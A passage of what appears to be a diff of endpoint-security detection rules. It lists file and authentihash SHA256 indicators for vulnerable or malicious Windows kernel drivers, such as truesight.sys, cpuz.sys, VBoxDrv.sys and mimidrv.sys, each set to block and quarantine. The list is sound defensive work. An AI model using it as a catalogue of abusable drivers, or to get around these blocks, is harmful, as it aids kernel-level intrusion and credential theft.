(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa611048-97d3-50f9-98ba-18930e5a85ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494565Z", + "creation_date": "2026-03-23T11:45:31.494567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06f34294ae1fa7ee0e3c46af301a7c486f08377ce0621c078382f7beed5a66d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa6a9347-b685-5cb6-86db-fa8bdddc8064", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.967290Z", + "creation_date": "2026-03-23T11:45:29.967293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04e88b7717aadc6b56dfa006b9414fc2c899c398d7e003627770e07fed52edfd", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa6b6a9e-6c24-5324-bcdc-127b37318ad0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474923Z", + "creation_date": "2026-03-23T11:45:30.474926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6d5d997bbb55b2328c6486595f6f3070a0d03b4dd7c1d2ec1510f43e61b9bcd", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"aa86f42d-4c8b-58d6-b70d-b893186e4c2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154264Z", + "creation_date": "2026-03-23T11:45:31.154266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "605165377339773fb440d0923fbdc1b12569de46e52b10496bd0fe72774001c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aaa6d240-abec-5f9b-ae9b-9520f10e9d08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825486Z", + "creation_date": "2026-03-23T11:45:30.825488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.825494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76d9641d60b8addda570a0f669b521afcc8552c5bbae08f10997cb512e226172", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aaab8eae-21dc-5991-9052-be5c46e7ab59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620141Z", + "creation_date": "2026-03-23T11:45:29.620143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620149Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b97f870c501714fa453cf18ae8a30c87d08ff1e6d784afdbb0121aea3da2dc28", + "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aab1141e-826a-5bd2-b087-723314de727f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829014Z", + "creation_date": "2026-03-23T11:45:31.829017Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13f91297fe2a1a582483c186dbc70d7dbaa53802d639584c1f809eb73dfa3604", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aad3455c-7963-5cfd-8697-e88d53045f61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807408Z", + "creation_date": "2026-03-23T11:45:31.807410Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807416Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "b59418c8276ece28f801fd2566c230cd66a2ab5b7b200de4743e495f5a772b34", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aad96b9f-4f01-58f9-91c9-037335bbd4c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149451Z", + "creation_date": "2026-03-23T11:45:31.149454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad5ddf3ea6ccdd15e056c8f0a6cbda25c68db0780307a7f35aaf19a7a11b4b2d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aadb2840-b4b9-5438-ba43-e17b115231a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815916Z", + "creation_date": "2026-03-23T11:45:31.815918Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815923Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "accff182f5536f07e09f5b618bd22b0fa5c91f7a29e248dca0a910272d2fe26e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aaddc46a-5ded-544c-adae-a45e0d9d0c7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608172Z", + "creation_date": "2026-03-23T11:45:29.608174Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608179Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "353aad3d49624aa250019ca2ced8983c7726f500f89165342683555a7ccfda42", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka 
VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aae9c26a-ee13-5a58-9f3d-87b3df71199a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979499Z", + "creation_date": "2026-03-23T11:45:29.979501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aaf4d2ab-42b1-56c4-b7e5-53fcb455480a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490191Z", + "creation_date": "2026-03-23T11:45:31.490193Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b717e36d39419311eb5046d6239adf4d4bb3d940a80b977456f05ea63a6fe46b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aafe6b63-a23a-53dc-8fc0-97ef6a80f6ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141629Z", + "creation_date": "2026-03-23T11:45:31.141631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd5eff8c4331b7fa1f066deb4524af3681539544327bd1134f06697943f8d379", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"aafff0d5-e908-5e7f-8f58-07ad62346a90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145038Z", + "creation_date": "2026-03-23T11:45:32.145040Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc2606740e4648c3732541db929f2e02ea8567520d35de57c671e93c71e632f3", + "comment": "Vulnerable Kernel Driver (aka dellinstrumentation.sys) [https://www.loldrivers.io/drivers/86b9c8d6-9c59-4fd4-befd-ab9a36a19e36/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab16375b-b57a-5c79-826c-a211bbf8acf8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978843Z", + "creation_date": "2026-03-23T11:45:29.978845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.978850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "641490e28b2a1ee223238f5d969b5abf60a1089afe597c4251b285449e6b3b04", + "comment": "Vulnerable Kernel Driver (aka speedfan.sys) [https://www.loldrivers.io/drivers/137daca4-0d7b-48aa-8574-f7eb6ad02526/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab1ca660-74ba-55e9-b571-a1cc9450dbc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471018Z", + "creation_date": "2026-03-23T11:45:30.471022Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9914ac1acbdc493d78c289bd185c301498c312602cabfcae8aa86cecb9fd14c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab20824e-23cf-5d11-bd45-4883a7474d70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819676Z", + "creation_date": "2026-03-23T11:45:31.819680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7506436dac00fddc3c1a39cc9ccd2030aec68d32434470397d7bd10fc12e091f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab2d6424-d24f-5435-a2e9-96ec1b0f619b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610066Z", + "creation_date": "2026-03-23T11:45:29.610068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e16a01ef44e4c56e87abfbe03b2989b0391b172c3ec162783ad640be65ab961", 
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab323f2d-36fb-5ab4-abb1-9dc42bb78b8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485288Z", + "creation_date": "2026-03-23T11:45:31.485292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac3a4d715589062cac8369ce06f5be060a6bc2fe5d960c8e52bfc755a64792b9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab339e5d-1d36-5830-bc6f-7f19205cf25c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822209Z", + "creation_date": "2026-03-23T11:45:30.822211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822217Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcf3c0762d6600506ff3b2f13ac6d978041b0b50131b3a564a558611dd3b96df", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab3b1d48-00a7-5317-9a79-eedba87a0815", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823106Z", + "creation_date": "2026-03-23T11:45:30.823108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b57569aaa0f4789d9642dd2189b0a82466b80ad32ff35f88127210ed105fe57", + "comment": "Vulnerable Kernel Driver (aka atlAccess.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ab49e97c-313e-59e1-ae4a-bea5d7b46d6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148312Z", + "creation_date": "2026-03-23T11:45:31.148314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33d1b153cc8f762d850b83d94325a829e0e00aef12b8c64e2543bbd774daebe2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab577ce4-9242-5972-97e7-9f2263b95466", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820515Z", + "creation_date": "2026-03-23T11:45:31.820517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.820525Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a3d1c4bd7153c6f49c0ea0f3db72126dfa4fa9235d783bb5e8ce9de1d4e78bd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ab6b172e-5c69-5cc6-904b-af7e87f74a99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824221Z", + "creation_date": 